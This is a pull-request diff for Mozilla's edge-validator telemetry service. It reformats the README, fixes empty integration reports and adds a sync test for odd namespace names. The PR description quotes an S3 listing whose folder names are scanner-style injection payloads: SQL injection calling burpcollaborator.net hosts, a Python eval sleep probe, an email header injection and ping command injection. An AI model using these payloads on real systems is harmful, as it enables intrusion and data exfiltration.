-It is possible to mount a set of local json-schemas by mounting a folder structure mirroring `mozilla-services/mozilla-pipeline-schemas` to the container's `/app/resources/schemas` directory.
+The exposed port can be changed through the `PORT` environment variable. It is
+possible to mount a set of local json-schemas by mounting a folder structure
+mirroring `mozilla-services/mozilla-pipeline-schemas` to the container's
+`/app/resources/schemas` directory.
 
 ```bash
-$ cd mozilla-pipeline-schemas
-$ docker run -p 8000 -v "$(pwd)"/schemas:/app/resources/schemas -it edge-validator
+cd mozilla-pipeline-schemas
+docker run -p 8000 -v "$(pwd)"/schemas:/app/resources/schemas -it edge-validator
 ```
 
 ## User Guide
+
 ## API
 
 ### Generic Ingestion
 
-The generic ingestion specification provides enough context to map the ping to a schema.
+The generic ingestion specification provides enough context to map the ping to a
+schema.
 
 The _namespace_ distinguishes different data collection systems from each other.
-Telemetry is the largest consumer of the ingestion system to date.
-The _document type_ differentiates messages in the ingestion pipeline.
-For example, the schemas of the main and crash pings share little overlap.
-The _document version_ allows for versioning between documents.
-Finally, the _document id_ is used to check for duplicates.
-This is validated in the running pipeline, but not supported here.
+Telemetry is the largest consumer of the ingestion system to date. The _document
+type_ differentiates messages in the ingestion pipeline. For example, the
+schemas of the main and crash pings share little overlap. The _document version_
+allows for versioning between documents. Finally, the _document id_ is used to
+check for duplicates. This is validated in the running pipeline, but not
+supported here.
 
-```
+```bash
 POST /submit/<namespace>/<doctype>/<docversion/[<docid>]
 ```
 
-The schemas are mounted under the application directory `/app/resources/schemas` with the following convention:
+The schemas are mounted under the application directory `/app/resources/schemas`
+with the following convention:
 
-```
+```bash
 /schemas/<NAMESPACE>/<DOCTYPE>.<DOCVERSION>.schema.json
 ```
 
 The following tree shows a subset of the resource directory.
 
-```
+```bash
 /app/resources
 └── schemas
     ├── telemetry
@@ -104,15 +111,19 @@ The following tree shows a subset of the resource directory.
 
 ### Telemetry Ingestion
 
-The edge-validator implements the Edge Server [POST request specification](https://docs.telemetry.mozilla.org/concepts/pipeline/http_edge_spec.html#postput-request) for Firefox Telemetry. 
-The validator will reroute the request as a generic ingestion request.
+The edge-validator implements the Edge Server [POST request
+specification](https://docs.telemetry.mozilla.org/concepts/pipeline/http_edge_spec.html#postput-request)
+for Firefox Telemetry. The validator will reroute the request as a generic
+ingestion request.
 
-```
+```bash
 POST /submit/<namespace>/<docid>/<appName>/<appVersion>/<appUpdateChannel>/<appBuildId>
 ```
 
 ### Installation
+
 #### Building from source
+
 ```bash
 # clone and set the working directory
 $ git clone --recursive https://github.com/mozilla-services/edge-validator.git
@@ -131,76 +142,83 @@ $ pip install --user pipenv
 $ make sync
 ```
 
-The docker environment is suitable for running a local service or for running any of the testing suites.
+The docker environment is suitable for running a local service or for running
+any of the testing suites.
+
 ```bash
-$ make shell
+make shell
 
 # Alternatively
 $ docker run -p 8000 -it edge-validator:latest pipenv shell
 ```
 
-If you don't require permanent changes to the engine itself, you may pull down a prebuilt docker image through
-DockerHub using the `mozilla/edge-validator:latest` image.
+If you don't require permanent changes to the engine itself, you may pull down a
+prebuilt docker image through DockerHub using the
+`mozilla/edge-validator:latest` image.
 
 ### Serving
+
 #### serving via docker host (recommended)
 
 ```bash
-$ docker --version          # ensure that docker is installed
-$ make build                # build the container
-$ make serve                # start the service on localhost:8000
+docker --version          # ensure that docker is installed
+make build                # build the container
+make serve                # start the service on localhost:8000
 ```
 
 #### serving via local host
-The docker host automates the following bootstrap process.
-`pipenv` should be installed on the host system.
+
+The docker host automates the following bootstrap process. `pipenv` should be
+installed on the host system.
 
 ```bash
-$ pipenv shell              # enter the application environment
-$ pipenv sync               # update the environment
-$ flask run --port 8000     # run the application
+pipenv shell              # enter the application environment
+pipenv sync               # update the environment
+flask run --port 8000     # run the application
 ```
 
 ### Running Tests
 
-Unit tests do not require any dependencies and can be run out of the box.
-The sync command will copy the test resources into the application resource folder.
+Unit tests do not require any dependencies and can be run out of the box. The
+sync command will copy the test resources into the application resource folder.
+
 ```bash
-$ make sync
-$ make test
+make sync
+make test
 ```
 
-You may also run the tests in docker in the same way as CI.
-A `junit.xml` file is generated in a `test-reports` folder.
-The image must be rebuilt to include modified test files.
+You may also run the tests in docker in the same way as CI. A `junit.xml` file
+is generated in a `test-reports` folder. The image must be rebuilt to include
+modified test files.
 
 ```bash
 IMAGE=edge-validator:latest ./docker_env.sh test
 ```
 
-# Running Integration Tests
+### Running Integration Tests
 
 An integration report gives a performance report based on sampled data.
 
 Ensure that the AWS cli is correctly configured.
 
 ```bash
-$ aws s3 ls s3://telemetry-test-bucket/
+aws s3 ls s3://telemetry-test-bucket/
 ```
 
 Then run the report.
 
 ```bash
 # Run using the local app context
-$ make report
+make report
 
 # Run using the docker host
-$ EXTERNAL=1 PORT=8000 make report
+EXTERNAL=1 PORT=8000 make report
 ```
 
 The report can also be run in Docker when given the correct permissions.
+
 ```bash
-$ docker run \
+docker run \
     -e AWS_ACCESS_KEY_ID \
     -e AWS_SECRET_ACCESS_KEY \
     -it edge-validator:latest \
@@ -208,6 +226,7 @@ $ docker run \
 ```
 
 You may also be interested in a machine consumable integration report.
+
 ```bash
-$ pipenv run ./integration.py report --report-path test-reports/integration.json
+pipenv run ./integration.py report --report-path test-reports/integration.json
 ```

--- a/integration.py
+++ b/integration.py
@@ -146,7 +146,11 @@ class Reporter(object):
         test_results = {"results": dict()}
 
         # Use the most recent data
-        submission_date = max(os.listdir(data_path))
+        date_like = [name for name in os.listdir(data_path) if name.isdigit()]
+        if not date_like:
+            raise RuntimeError("missing a data folder with submission date")
+
+        submission_date = max(date_like)
         data_path = os.path.join(data_path, submission_date)
 
         for root, _, files in os.walk(data_path):
@@ -171,6 +175,9 @@ class Reporter(object):
                     continue
                 self.display(result)
                 test_results["results"] = {**result, **test_results["results"]}
+
+        if not test_results["results"]:
+            raise ValueError("the result set is empty; try synchronizing data")
 
         if report_path:
             self.save(report_path, test_results)

--- a/integration.py
+++ b/integration.py
@@ -240,10 +240,10 @@ def integrate():
               default=True,
               help="fetch sampled data from a remote, performed by default")
 @click.option('--data-bucket', type=str,
-              default='net-mozaws-prod-us-west-2-pipeline-analysis',
+              default='telemetry-parquet',
               help="location of the s3 bucket")
 @click.option('--data-prefix', type=str,
-              default='amiyaguchi/sanitized-landfill-sample/v3',
+              default='sanitized-landfill-sample/v3',
               help="location of the sanitized-landfill-sample dataset")
 @click.option('--include-tests/--ignore-tests',
               default=True,

--- a/integration.py
+++ b/integration.py
@@ -322,7 +322,8 @@ def compare_cmd(rev_a, rev_b, data_path, report_path, cache):
             return output_path
 
         Environment.checkout(rev)
-        Environment.sync()
+        # NOTE: this sync only copies schemas and uses cached data
+        Environment.sync({"INCLUDE_DATA": "false"})
         Reporter().run(data_path, output_path)
 
         return output_path

--- a/sync.sh
+++ b/sync.sh
@@ -12,8 +12,6 @@ set -euo pipefail
 if [[ ! -z ${DEBUG:-} ]]; then set -x; fi
 
 # The environment must set up with the correct AWS credentials
-SRC_DATA_BUCKET=${SOURCE_DATA_BUCKET:?}
-SRC_DATA_PREFIX=${SOURCE_DATA_PREFIX:?}
 MPS_ROOT=${MPS_ROOT:-"./mozilla-pipeline-schemas"}
 OUTPUT_PATH=${OUTPUT_PATH:-"resources"}
 INCLUDE_DATA=${INCLUDE_DATA:-"true"}
@@ -54,6 +52,8 @@ function get_path_value {
 }
 
 function sync_data {
+    SRC_DATA_BUCKET=${SOURCE_DATA_BUCKET:?}
+    SRC_DATA_PREFIX=${SOURCE_DATA_PREFIX:?}
     src_data_path="s3://${SRC_DATA_BUCKET}/${SRC_DATA_PREFIX}"
 
     # Use only the most recent data

--- a/sync.sh
+++ b/sync.sh
@@ -12,8 +12,8 @@ set -euo pipefail
 if [[ ! -z ${DEBUG:-} ]]; then set -x; fi
 
 # The environment must set up with the correct AWS credentials
-SRC_DATA_BUCKET=${SOURCE_DATA_BUCKET:-"net-mozaws-prod-us-west-2-pipeline-analysis"}
-SRC_DATA_PREFIX=${SOURCE_DATA_PREFIX:-"amiyaguchi/sanitized-landfill-sample/v3"}
+SRC_DATA_BUCKET=${SOURCE_DATA_BUCKET:?}
+SRC_DATA_PREFIX=${SOURCE_DATA_PREFIX:?}
 MPS_ROOT=${MPS_ROOT:-"./mozilla-pipeline-schemas"}
 OUTPUT_PATH=${OUTPUT_PATH:-"resources"}
 INCLUDE_DATA=${INCLUDE_DATA:-"true"}
@@ -67,10 +67,10 @@ function sync_data {
     # List all available json samples.
     # ex: sanitized-landfill-sample/v3/submission_date_s3=20181212/namespace=telemetry/doc_type=anonymous/doc_version=4/*.json
     paths=$(
-        $aws s3 ls --recursive "$src_data_path" |  # recursively list all files
-        grep .json |                              # find leaf nodes containing sampled documents
-        tr -s ' ' | cut -d ' ' -f4                # get the prefix for the json document
-                                                  # aws ls returns multiple spaces, so pass it through tr
+        $aws s3 ls --recursive "$src_data_path" |   # recursively list all files
+        tr -s ' ' |                                 # replace multiple spaces
+        cut -d ' ' -f4 |                            # get the column with the path
+        grep .json
     )
 
     echo "Updating local sampled data from ${src_data_path}"

--- a/tests/test_command_sync.py
+++ b/tests/test_command_sync.py
@@ -48,25 +48,13 @@ def awscli(command, cwd=None):
     return res.stdout.decode("utf-8")
 
 
-# directory depths d<k>
-@pytest.mark.parametrize("prefix", ["d1/d2", "d1/d2/d3", "d1/d2/d3/d4"])
-def test_synchronize(minio, tmp_path, prefix):
-    cwd = Path(__file__).parent
-
-    bucket = "test-bucket"
-    submission_date = "20181212"
-    namespace = "testing"
-    doc_id = "test"
-    doc_version = "1"
-
-    awscli(f"s3 mb s3://{bucket}")
-
+def upload_test_data(bucket, prefix, submission_date, namespace, doc_type, doc_version):
     test_sample = (
         Path(__file__).parent
         / "resources"
         / "data"
-        / namespace
-        / doc_id
+        / "testing"
+        / "test"
         / "test.1.batch.json"
     )
 
@@ -74,14 +62,29 @@ def test_synchronize(minio, tmp_path, prefix):
         f"s3://{bucket}/{prefix}/"
         f"submission_date_s3={submission_date}/"
         f"namespace={namespace}/"
-        f"doc_id={doc_id}/"
+        f"doc_id={doc_type}/"
         f"doc_version={doc_version}/"
         "long-hash.json"
     )
 
-    awscli(f"s3 cp {test_sample} {remote_path}")
+    awscli(f"""s3 cp "{test_sample}" "{remote_path}" """)
     assert "long-hash.json" in awscli(f"s3 ls --recursive s3://{bucket}")
-    print(awscli(f"s3 cp {remote_path} -"))
+    print(awscli(f"""s3 cp "{remote_path}" -"""))
+
+
+# directory depths d<k>
+@pytest.mark.parametrize("prefix", ["d1/d2", "d1/d2/d3", "d1/d2/d3/d4"])
+def test_synchronize_path_depth(minio, tmp_path, prefix):
+    cwd = Path(__file__).parent
+
+    bucket = "test-bucket"
+    submission_date = "20181212"
+    namespace = "testing"
+    doc_type = "test"
+    doc_version = "1"
+
+    awscli(f"s3 mb s3://{bucket}")
+    upload_test_data(bucket, prefix, submission_date, namespace, doc_type, doc_version)
 
     sync = cwd.parent / "sync.sh"
     assert sync.exists()
@@ -113,11 +116,57 @@ def test_synchronize(minio, tmp_path, prefix):
 
     # assert that files are being copied down correctly
     resource = test_dir / "resources"
-    assert (resource / "schemas" / namespace / doc_id / "test.1.schema.json").exists()
+    assert (resource / "schemas" / namespace / doc_type / "test.1.schema.json").exists()
     assert (
         resource
         / "data"
         / submission_date
         / namespace
-        / f"{doc_id}.{doc_version}.batch.json"
+        / f"{doc_type}.{doc_version}.batch.json"
     ).exists()
+
+
+def test_synchronize_ignores_spaces_in_namespace(minio, tmp_path):
+    cwd = Path(__file__).parent
+
+    bucket = "test-bucket"
+    prefix = "sample/v1"
+    namespace = "testing"
+    submission_date = "20181212"
+    doc_type = "test"
+    doc_version = "1"
+
+    awscli(f"s3 mb s3://{bucket}")
+    upload_test_data(bucket, prefix, submission_date, namespace, doc_type, doc_version)
+    upload_test_data(bucket, prefix, submission_date, "name space", doc_type, doc_version)
+
+    sync = cwd.parent / "sync.sh"
+    assert sync.exists()
+
+    # setup the test directory
+    test_dir = tmp_path / "root"
+
+    # move testing schemas into mozilla-pipeline-schemas
+    shutil.copytree(
+        str(cwd / "resources" / "schemas"),
+        str(test_dir / "mozilla-pipeline-schemas" / "schemas"),
+    )
+
+    # run the synchronization script
+    res = subprocess.run(
+        [sync],
+        env={
+            "AWS_ACCESS_KEY_ID": TEST_ACCESS_KEY,
+            "AWS_SECRET_ACCESS_KEY": TEST_SECRET_KEY,
+            "SOURCE_DATA_BUCKET": bucket,
+            "SOURCE_DATA_PREFIX": prefix,
+            "ENDPOINT_URL": "http://localhost:9000",
+            "INCLUDE_TESTS": "false",
+            "DEBUG": "true",
+        },
+        cwd=test_dir,
+    )
+    assert res.returncode == 0
+
+    resource = test_dir / "resources"
+    assert os.listdir(resource / "data" / submission_date) == [namespace]

--- a/tests/test_command_sync.py
+++ b/tests/test_command_sync.py
@@ -35,7 +35,7 @@ def minio():
 
 def awscli(command, cwd=None):
     res = subprocess.run(
-        ["aws", "--endpoint-url", "http://localhost:9000"] + command.split(),
+        ["bash", "-c", f"aws --endpoint-url http://localhost:9000 {command}"],
         stdout=subprocess.PIPE,
         env={
             "AWS_ACCESS_KEY_ID": TEST_ACCESS_KEY,


### PR DESCRIPTION
This PR a few small things like updating the mps submodule, making the `integration` script the only supported entrypoint into reporting, and updating system dependencies. 

It also fixes the bug causing empty reports on `mozilla-pipeline-schemas`. In short, the bug was as follows:

```
$ aws s3 ls s3://telemetry-parquet/sanitized-landfill-sample/v3/submission_date_s3=20190718/                           PRE namespace=(select load_file(%27%5C%5C%5C%5C93axjpekldk99vfev6w6623jaag44vsmuarxil7.burpcollaborator.net%5C%5Cknm%27))/
                           PRE namespace=activity-stream/
                           PRE namespace=bugzilla/
                           PRE namespace=coverage/
                           PRE namespace=eng-workflow/
                           PRE namespace=firefox-installer/
                           PRE namespace=firefox-launcher-process/
                           PRE namespace=mobile/
                           PRE namespace=org-mozilla-fenix-nightly/
                           PRE namespace=org-mozilla-fenix-performancetest/
                           PRE namespace=org-mozilla-fenix/
                           PRE namespace=org-mozilla-reference-browser/
                           PRE namespace=org-mozilla-tv-firefox/
                           PRE namespace=org-mozilla-tv-testfox/
                           PRE namespace=pocket/
                           PRE namespace=telemetry%27+eval(compile(%27for x in range(1)%3A%5Cn import time%5Cn time.sleep(20)%27,%27a%27,%27single%27))+%27/
                           PRE namespace=telemetry);declare @q varchar(99);set @q%3D%27%5C%5C3vzrbj6ed7c31p78n0o0ywvd248ywpkgc49r0fp.burpcollab%27+%27orator.net%5Crli%27; exec master.dbo.xp_dirtree @q;-- /
                           PRE namespace=telemetry/
                           PRE namespace=telemetry91195661%27 or %278691%27%3D%278697/
                           PRE namespace=telemetry>%0D%0ABCC%3Aqpje56017u6qvc1vhninsjp0wr2lqde58t5gw4l@burpcollaborator.net%0D%0Awhi%3A z/
                           PRE namespace=telemetry|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` %23%27 |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` %23%5C%22 |ping -n 21 127.0.0.1/
                           PRE namespace=webpagetest/
2019-07-18 18:20:04          0 _SUCCESS
```

The garbage at the end with spaces in it causes the `namespace_dir` variable to be named `sanitized-landfill-sample/v3`. The integration command expects folders that are dates -- the max between a folder name that is a number vs word is the word. That folder is empty, so the report ends up being empty.